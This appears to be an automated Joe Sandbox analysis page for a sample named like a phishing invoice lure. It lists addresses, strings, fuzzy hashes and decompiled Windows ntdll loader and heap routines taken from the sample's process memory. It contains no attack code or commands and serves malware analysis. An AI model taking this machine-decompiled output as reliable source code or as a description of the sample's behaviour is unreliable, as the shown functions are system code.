0x00b52985
0x00b52963
0x00b52978
0x00b5297d
0x00b5298b
0x00b52990
0x00b52995
0x00b5299d
0x00b529a1
0x00b529a2
0x00b529a2
0x00b529a7
0x00b529a7
0x00b52951
0x00b0b4ba
0x00b0b4ba
0x00b0b4bd
0x00b0b4c2
0x00b0b6d4
0x00b0b4c8
0x00b0b4c8
0x00b0b4c8
0x00b0b4cd
0x00b0b4d0
0x00b0b4d9
0x00b0b4df
0x00b0b4e2
0x00b529b7
0x00b529bd
0x00000000
0x00b0b4e8
0x00b0b4e8
0x00b0b4ef
0x00b0b4fa
0x00b0b703
0x00b0b709
0x00b0b70b
0x00b0b711
0x00b0b711
0x00b0b70b
0x00b0b503
0x00b0b50c
0x00b0b511
0x00b0b514
0x00b0b519
0x00b529c5
0x00b529c7
0x00b529cc
0x00b529cd
0x00b529cf
0x00b529d0
0x00b529d2
0x00b529d7
0x00b529d9
0x00b529ee
0x00b529ee
0x00b529f4
0x00b529fa
0x00b52a01
0x00000000
0x00b52a01
0x00b529db
0x00b529df
0x00000000
0x00000000
0x00b529e1
0x00b529e4
0x00000000
0x00000000
0x00b529e6
0x00b529e6
0x00b0b51f
0x00b0b51f
0x00b0b520
0x00b0b525
0x00b0b52b
0x00b0b52d
0x00b0b52e
0x00b0b530
0x00b0b535
0x00b0b53b
0x00b0b53d
0x00b52a07
0x00000000
0x00b52a07
0x00b0b549
0x00b0b54e
0x00b52a12
0x00b52a15
0x00000000
0x00000000
0x00b52a24
0x00b0b559
0x00b0b55c
0x00b52a34
0x00b52a3b
0x00b52a4d
0x00b52a4d
0x00b52a3b
0x00b0b566
0x00b0b56b
0x00b0b56f
0x00b0b57b
0x00b0b582
0x00b52a57
0x00b52a5c
0x00b52a5c
0x00b0b582
0x00b0b58b
0x00b0b58e
0x00b0b592
0x00b0b596
0x00b0b599
0x00b0b59b
0x00b0b59e
0x00b0b5a3
0x00b0b5a6
0x00b0b5a9
0x00b52a66
0x00b52a67
0x00b52a73
0x00b52a78
0x00b0b5b8
0x00b0b5b8
0x00b0b5bb
0x00b0b5bd
0x00b0b5bd
0x00b0b5c4
0x00b0b5f7
0x00b0b5f7
0x00b0b600
0x00b0b606
0x00b0b60c
0x00b0b612
0x00b0b618
0x00b0b621
0x00b0b623
0x00b0b629
0x00b0b629
0x00b0b62c
0x00b0b62f
0x00b0b633
0x00b0b636
0x00b0b639
0x00b0b71d
0x00b0b720
0x00b0b736
0x00b0b660
0x00b0b660
0x00b0b662
0x00b0b665
0x00b0b66a
0x00b0b6e6
0x00b0b6e7
0x00b0b6ea
0x00b0b6ef
0x00b52ad1
0x00b52ad2
0x00b52ad8
0x00b52add
0x00b52add
0x00b0b6f5
0x00b0b6f5
0x00b0b672
0x00b0b675
0x00b0b67a
0x00b52ae5
0x00b52ae8
0x00000000
0x00000000
0x00b52af4
0x00b52afc
0x00000000
0x00b0b680
0x00b0b680
0x00b0b680
0x00b0b685
0x00b0b687
0x00b0b68a
0x00b52b06
0x00b52b0c
0x00b52b13
0x00b52b1e
0x00b52b20
0x00b52b2b
0x00b52b2b
0x00b52b2b
0x00b52b34
0x00b52b45
0x00b52b45
0x00b52b13
0x00b0b696
0x00b0b69b
0x00b0b6a0
0x00b52b4f
0x00b52b52
0x00000000
0x00000000
0x00b52b61
0x00000000
0x00b0b6a6
0x00b0b6a6
0x00b0b6a6
0x00b0b6a8
0x00b0b6ab
0x00b52b70
0x00b52b72
0x00b52b7d
0x00b52b7d
0x00b52b7d
0x00b52b86
0x00b52b97
0x00b52b97
0x00b0b6b1
0x00000000
0x00b0b6b1
0x00b0b6a0
0x00b0b67a
0x00b0b722
0x00b0b722
0x00b0b655
0x00b0b65d
0x00000000
0x00b0b5c6
0x00b0b5c6
0x00b0b5ce
0x00b52a83
0x00b52a97
0x00b52a97
0x00b52a9a
0x00000000
0x00000000
0x00b52a88
0x00b52a8a
0x00b52a8c
0x00b52a8f
0x00b52a92
0x00b52aa1
0x00b52aa1
0x00b52aa2
0x00b52aab
0x00b52ab0
0x00000000
0x00b52ab0
0x00b52a94
0x00b52a94
0x00000000
0x00b52a9c
0x00b0b5d4
0x00b0b5d4
0x00b0b5d6
0x00b0b5d9
0x00b0b5de
0x00b0b5e1
0x00b0b5e4
0x00b52ab8
0x00b52ab9
0x00b52ac4
0x00b52ac9
0x00b0b5f2
0x00b0b5f2
0x00b0b5f4
0x00b0b5f4
0x00000000
0x00b0b5e4
0x00b0b5c4
0x00b0b554
0x00b0b554
0x00000000
0x00b0b554

Strings

HEAP[%wZ]: , xrefs: 00B52973
HEAP: , xrefs: 00B52980
(UCRBlock->Size >= *Size), xrefs: 00B5298B

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: 05b9e89c08a62f1b4a768c85f50d8ab27e72dcce2ea3d2e264042b6bce2b8339
Instruction ID: 51163c3dc77a27aa32ff57a9d3d34d60d0a51df986c8d0a3b0b898c0a8698be4
Opcode Fuzzy Hash: 05b9e89c08a62f1b4a768c85f50d8ab27e72dcce2ea3d2e264042b6bce2b8339
Instruction Fuzzy Hash: F7E17A70A01205AFDB19CF68C895FAABBF5FB49300F2481E9E8169B391D735ED41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00AF8794, Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00AF8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E00AF934A() != 0) {
								_t159 = E00B6A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0xbd5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E00B65510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0xbd5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E00AF849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E00AF8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E00AF8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0xbd5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0xbd5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E00B02280(_t92, 0xbd86cc);
															_t94 = E00BB9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E00B161A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0xbd5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E00AF8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0xbd5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0xbd5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E00B2F380(_t136, 0xac1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E00B02280(_t108, 0xbd86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E00B161A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E00BB9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E00AFFFB0(_t118, _t156, 0xbd86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E00B29A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x00af8799
0x00af879d
0x00af87a1
0x00af87a3
0x00af87a8
0x00af87c3
0x00af87c3
0x00af87c8
0x00af87d1
0x00af87d4
0x00af87d8
0x00af87e5
0x00af87ec
0x00b49bfe
0x00b49c00
0x00b49c02
0x00b49c08
0x00b49c0d
0x00b49c0f
0x00b49c14
0x00b49c2d
0x00b49c32
0x00b49c37
0x00b49c3a
0x00b49c3c
0x00b49c42
0x00b49c42
0x00b49c3c
0x00b49c02
0x00af87da
0x00af87df
0x00af87e3
0x00000000
0x00000000
0x00af87e3
0x00af87f2
0x00000000
0x00af87fb
0x00af87fd
0x00af87fe
0x00af880e
0x00af880f
0x00af8810
0x00af8814
0x00af881a
0x00af881c
0x00af881f
0x00af8821
0x00af8822
0x00af8824
0x00af8826
0x00af882c
0x00af882e
0x00b49c48
0x00b49c48
0x00af8834
0x00af8834
0x00af8837
0x00000000
0x00000000
0x00af8837
0x00af882e
0x00af883d
0x00af8840
0x00af8843
0x00af8846
0x00af8849
0x00af884c
0x00af884e
0x00af8850
0x00af8852
0x00af8854
0x00af8857
0x00af88b4
0x00af88b6
0x00af88b6
0x00af8859
0x00af8859
0x00af8859
0x00af8861
0x00af8866
0x00af886a
0x00af893d
0x00af8941
0x00000000
0x00af8947
0x00af8947
0x00af894a
0x00af894c
0x00000000
0x00af8952
0x00af8955
0x00af895a
0x00af895d
0x00af895d
0x00af895f
0x00af8961
0x00af8961
0x00af8968
0x00000000
0x00000000
0x00af896a
0x00af896b
0x00af896e
0x00000000
0x00af8970
0x00af8970
0x00af8970
0x00af8970
0x00af8972
0x00af8972
0x00af8974
0x00000000
0x00af897a
0x00af897a
0x00af897d
0x00000000
0x00af8983
0x00b49c65
0x00b49c6d
0x00b49c72
0x00b49c75
0x00b49c75
0x00b49c82
0x00b49c86
0x00b49c87
0x00b49c88
0x00b49c89
0x00b49c8c
0x00b49c90
0x00b49c95
0x00b49c97
0x00b49ca0
0x00b49ca3
0x00b49ca9
0x00b49ca9
0x00000000
0x00b49ca9
0x00b49ca3
0x00000000
0x00b49c97
0x00af897d
0x00000000
0x00af8974
0x00af8988
0x00af8992
0x00af8996
0x00000000
0x00af8996
0x00af894c
0x00000000
0x00af8870
0x00af887b
0x00af887d
0x00af887f
0x00af8881
0x00af8884
0x00af8884
0x00af8886
0x00af8889
0x00af888c
0x00af888e
0x00af8891
0x00af8891
0x00af8898
0x00000000
0x00000000
0x00af889a
0x00af889b
0x00af889e
0x00000000
0x00000000
0x00af88a0
0x00af88a8
0x00af88b0
0x00af88b2
0x00af88d3
0x00af88d5
0x00000000
0x00af88d7
0x00af88db
0x00af88dc
0x00af88e0
0x00af88e8
0x00af88ee
0x00af88f0
0x00af88f3
0x00af88fc
0x00af8901
0x00af8906
0x00af890c
0x00af890c
0x00af890f
0x00af8916
0x00af8917
0x00af8918
0x00af8919
0x00af891a
0x00af891f
0x00af8921
0x00b49c52
0x00b49c55
0x00b49c5b
0x00b49cac
0x00b49cc0
0x00b49cc0
0x00b49c55
0x00af8927
0x00af8927
0x00af892f
0x00af8933
0x00000000
0x00af88f5
0x00af88f5
0x00000000
0x00af88f7
0x00af88f7
0x00af88fa
0x00000000
0x00000000
0x00000000
0x00000000
0x00af88fa
0x00af88f5
0x00af88f3
0x00000000
0x00af88d5
0x00000000
0x00af88b2
0x00af88c9
0x00000000
0x00af88c9
0x00af887f
0x00af886a
0x00af8857
0x00af8852
0x00af88bf
0x00af88bf
0x00af87aa
0x00af87ad
0x00af87ae
0x00af87b4
0x00af87b5
0x00af87b6
0x00af87b8
0x00af87bd
0x00af87c1
0x00af87f4
0x00af87fa
0x00000000
0x00000000
0x00000000
0x00af87c1
0x00000000

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 00B49C28
LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 00B49C18
LdrpDoPostSnapWork, xrefs: 00B49C1E

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: InitializeThunk
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 2994545307-1948996284
Opcode ID: 456bd5b1418a6d40e53bf2ed6b9eac7590eb47095f47edc87e0b16b7d0b8f6e3
Instruction ID: db18fd8e5cb9151b6e9cf8152b67cd573e77f3508b5b1da0b62378180efbb974
Opcode Fuzzy Hash: 456bd5b1418a6d40e53bf2ed6b9eac7590eb47095f47edc87e0b16b7d0b8f6e3
Instruction Fuzzy Hash: 7491C131A0021AABDF18DF99C8C1ABAB7B5FF44350B5541A9FA05AB251EF74ED01CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 00B1AC7B, Relevance: 4.0, Strings: 3, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00B1AC7B(void* __ecx, signed short* __edx) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				signed char _t75;
				signed int _t79;
				signed int _t88;
				intOrPtr _t89;
				signed int _t96;
				signed char* _t97;
				intOrPtr _t98;
				signed int _t101;
				signed char* _t102;
				intOrPtr _t103;
				signed int _t105;
				signed char* _t106;
				signed int _t131;
				signed int _t138;
				void* _t149;
				signed short* _t150;

				_t150 = __edx;
				_t149 = __ecx;
				_t70 =  *__edx & 0x0000ffff;
				__edx[1] = __edx[1] & 0x000000f8;
				__edx[3] = 0;
				_v8 =  *__edx & 0x0000ffff;
				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
					_t39 =  &(_t150[8]); // 0x8
					E00B3D5E0(_t39, _t70 * 8 - 0x10, 0xfeeefeee);
					__edx[1] = __edx[1] | 0x00000004;
				}
				_t75 =  *(_t149 + 0xcc) ^  *0xbd8a68;
				if(_t75 != 0) {
					L4:
					if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
						_t150[1] = _t150[0] ^ _t150[1] ^  *_t150;
						_t79 =  *(_t149 + 0x50);
						 *_t150 =  *_t150 ^ _t79;
						return _t79;
					}
					return _t75;
				} else {
					_t9 =  &(_t150[0x80f]); // 0x1017
					_t138 = _t9 & 0xfffff000;
					_t10 =  &(_t150[0x14]); // 0x20
					_v12 = _t138;
					if(_t138 == _t10) {
						_t138 = _t138 + 0x1000;
						_v12 = _t138;
					}
					_t75 = _t150 + (( *_t150 & 0x0000ffff) + 0xfffffffe) * 0x00000008 & 0xfffff000;
					if(_t75 > _t138) {
						_v8 = _t75 - _t138;
						_push(0x4000);
						_push( &_v8);
						_push( &_v12);
						_push(0xffffffff);
						_t131 = E00B296E0();
						__eflags = _t131 - 0xc0000045;
						if(_t131 == 0xc0000045) {
							_t88 = E00B93C60(_v12, _v8);
							__eflags = _t88;
							if(_t88 != 0) {
								_push(0x4000);
								_push( &_v8);
								_push( &_v12);
								_push(0xffffffff);
								_t131 = E00B296E0();
							}
						}
						_t89 =  *[fs:0x30];
						__eflags = _t131;
						if(_t131 < 0) {
							__eflags =  *(_t89 + 0xc);
							if( *(_t89 + 0xc) == 0) {
								_push("HEAP: ");
								E00AEB150();
							} else {
								E00AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_v8);
							_push(_v12);
							_push(_t149);
							_t75 = E00AEB150("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t131);
							goto L4;
						} else {
							_t96 =  *(_t89 + 0x50);
							_t132 = 0x7ffe0380;
							__eflags = _t96;
							if(_t96 != 0) {
								__eflags =  *_t96;
								if( *_t96 == 0) {
									goto L10;
								}
								_t97 =  *( *[fs:0x30] + 0x50) + 0x226;
								L11:
								__eflags =  *_t97;
								if( *_t97 != 0) {
									_t98 =  *[fs:0x30];
									__eflags =  *(_t98 + 0x240) & 0x00000001;
									if(( *(_t98 + 0x240) & 0x00000001) != 0) {
										E00BA14FB(_t132, _t149, _v12, _v8, 7);
									}
								}
								 *((intOrPtr*)(_t149 + 0x234)) =  *((intOrPtr*)(_t149 + 0x234)) + _v8;
								 *((intOrPtr*)(_t149 + 0x210)) =  *((intOrPtr*)(_t149 + 0x210)) + 1;
								 *((intOrPtr*)(_t149 + 0x230)) =  *((intOrPtr*)(_t149 + 0x230)) + 1;
								 *((intOrPtr*)(_t149 + 0x220)) =  *((intOrPtr*)(_t149 + 0x220)) + 1;
								_t101 =  *( *[fs:0x30] + 0x50);
								__eflags = _t101;
								if(_t101 != 0) {
									__eflags =  *_t101;
									if( *_t101 == 0) {
										goto L13;
									}
									_t102 =  *( *[fs:0x30] + 0x50) + 0x226;
									goto L14;
								} else {
									L13:
									_t102 = _t132;
									L14:
									__eflags =  *_t102;
									if( *_t102 != 0) {
										_t103 =  *[fs:0x30];
										__eflags =  *(_t103 + 0x240) & 0x00000001;
										if(( *(_t103 + 0x240) & 0x00000001) != 0) {
											__eflags = E00B07D50();
											if(__eflags != 0) {
												_t132 =  *( *[fs:0x30] + 0x50) + 0x226;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x226;
											}
											E00BA1411(_t132, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t132 & 0x000000ff);
										}
									}
									_t133 = 0x7ffe038a;
									_t105 =  *( *[fs:0x30] + 0x50);
									__eflags = _t105;
									if(_t105 != 0) {
										__eflags =  *_t105;
										if( *_t105 == 0) {
											goto L16;
										}
										_t106 =  *( *[fs:0x30] + 0x50) + 0x230;
										goto L17;
									} else {
										L16:
										_t106 = _t133;
										L17:
										__eflags =  *_t106;
										if( *_t106 != 0) {
											__eflags = E00B07D50();
											if(__eflags != 0) {
												_t133 =  *( *[fs:0x30] + 0x50) + 0x230;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x230;
											}
											E00BA1411(_t133, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t133 & 0x000000ff);
										}
										_t75 = _t150[1] & 0x00000013 | 0x00000008;
										_t150[1] = _t75;
										goto L4;
									}
								}
							}
							L10:
							_t97 = _t132;
							goto L11;
						}
					} else {
						goto L4;
					}
				}
			}

0x00b1ac85
0x00b1ac88
0x00b1ac8a
0x00b1ac8d
0x00b1ac91
0x00b1ac99
0x00b1ac9c
0x00b59f57
0x00b59f5b
0x00b59f60
0x00b59f60
0x00b1aca8
0x00b1acae
0x00b1acda
0x00b1acde
0x00b1ace8
0x00b1aceb
0x00b1acee
0x00000000
0x00b1acee
0x00b1acf6
0x00b1acb0
0x00b1acb0
0x00b1acbb
0x00b1acbd
0x00b1acc0
0x00b1acc5
0x00b1adae
0x00b1adb4
0x00b1adb4
0x00b1acd4
0x00b1acd8
0x00b1acf9
0x00b1acff
0x00b1ad04
0x00b1ad08
0x00b1ad09
0x00b1ad10
0x00b1ad12
0x00b1ad18
0x00b59f6f
0x00b59f74
0x00b59f76
0x00b59f7c
0x00b59f84
0x00b59f88
0x00b59f89
0x00b59f90
0x00b59f90
0x00b59f76
0x00b1ad1e
0x00b1ad24
0x00b1ad26
0x00b5a097
0x00b5a09b
0x00b5a0ba
0x00b5a0bf
0x00b5a09d
0x00b5a0b2
0x00b5a0b7
0x00b5a0c5
0x00b5a0c8
0x00b5a0cb
0x00b5a0d2
0x00000000
0x00b1ad2c
0x00b1ad2c
0x00b1ad2f
0x00b1ad34
0x00b1ad36
0x00b59f97
0x00b59f9a
0x00000000
0x00000000
0x00b59fa9
0x00b1ad3e
0x00b1ad3e
0x00b1ad41
0x00b59fb3
0x00b59fb9
0x00b59fc0
0x00b59fd0
0x00b59fd0
0x00b59fc0
0x00b1ad4a
0x00b1ad50
0x00b1ad5c
0x00b1ad62
0x00b1ad68
0x00b1ad6b
0x00b1ad6d
0x00b59fda
0x00b59fdd
0x00000000
0x00000000
0x00b59fec
0x00000000
0x00b1ad73
0x00b1ad73
0x00b1ad73
0x00b1ad75
0x00b1ad75
0x00b1ad78
0x00b59ff6
0x00b59ffc
0x00b5a003
0x00b5a00e
0x00b5a010
0x00b5a01b
0x00b5a01b
0x00b5a01b
0x00b5a038
0x00b5a038
0x00b5a003
0x00b1ad84
0x00b1ad89
0x00b1ad8c
0x00b1ad8e
0x00b5a042
0x00b5a045
0x00000000
0x00000000
0x00b5a054
0x00000000
0x00b1ad94
0x00b1ad94
0x00b1ad94
0x00b1ad96
0x00b1ad96
0x00b1ad99
0x00b5a063
0x00b5a065
0x00b5a070
0x00b5a070
0x00b5a070
0x00b5a08d
0x00b5a08d
0x00b1ada4
0x00b1ada6
0x00000000
0x00b1ada6
0x00b1ad8e
0x00b1ad6d
0x00b1ad3c
0x00b1ad3c
0x00000000
0x00b1ad3c
0x00000000
0x00000000
0x00000000
0x00b1acd8

Strings

HEAP[%wZ]: , xrefs: 00B5A0AD
HEAP: , xrefs: 00B5A0BA
RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 00B5A0CD

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
API String ID: 0-1340214556
Opcode ID: 39176c34efadd52ac85f350f74d441059a2456517ab45300a4c39bffbe85ccc2
Instruction ID: 14e0ee30ad7b7bedbd605944cbea429e568ea79ead46efa444613b7683d82d01
Opcode Fuzzy Hash: 39176c34efadd52ac85f350f74d441059a2456517ab45300a4c39bffbe85ccc2
Instruction Fuzzy Hash: 48811371205A84EFD726CBA8C894BAABBF8FF04310F1401E5E9518B692D734FD80CB11

Uniqueness

Uniqueness Score: -1.00%

Function 00B0B73D, Relevance: 3.9, Strings: 3, Instructions: 190
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E00B0B73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t72;
				char _t76;
				signed char _t77;
				intOrPtr* _t80;
				unsigned int _t85;
				signed int* _t86;
				signed int _t88;
				signed char _t89;
				intOrPtr _t90;
				intOrPtr _t101;
				intOrPtr* _t111;
				void* _t117;
				intOrPtr* _t118;
				signed int _t120;
				signed char _t121;
				intOrPtr* _t123;
				signed int _t126;
				intOrPtr _t136;
				signed int _t139;
				void* _t140;
				signed int _t141;
				void* _t147;

				_t111 = _a4;
				_t140 = __ecx;
				_v8 = __edx;
				_t3 = _t111 + 0x18; // 0x0
				 *((intOrPtr*)(_t111 + 0x10)) = _t3;
				_t5 = _t111 - 8; // -32
				_t141 = _t5;
				 *(_t111 + 0x14) = _a8;
				_t72 = 4;
				 *(_t141 + 2) = 1;
				 *_t141 = _t72;
				 *((char*)(_t141 + 7)) = 3;
				_t134 =  *((intOrPtr*)(__edx + 0x18));
				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
					_t76 = (_t141 - __edx >> 0x10) + 1;
					_v12 = _t76;
					__eflags = _t76 - 0xfe;
					if(_t76 >= 0xfe) {
						_push(__edx);
						_push(0);
						E00BAA80D(_t134, 3, _t141, __edx);
						_t76 = _v12;
					}
				} else {
					_t76 = 0;
				}
				 *((char*)(_t141 + 6)) = _t76;
				if( *0xbd8748 >= 1) {
					__eflags = _a12 - _t141;
					if(_a12 <= _t141) {
						goto L4;
					}
					_t101 =  *[fs:0x30];
					__eflags =  *(_t101 + 0xc);
					if( *(_t101 + 0xc) == 0) {
						_push("HEAP: ");
						E00AEB150();
					} else {
						E00AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
					E00AEB150();
					__eflags =  *0xbd7bc8;
					if(__eflags == 0) {
						E00BA2073(_t111, 1, _t140, __eflags);
					}
					goto L3;
				} else {
					L3:
					_t147 = _a12 - _t141;
					L4:
					if(_t147 != 0) {
						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
					}
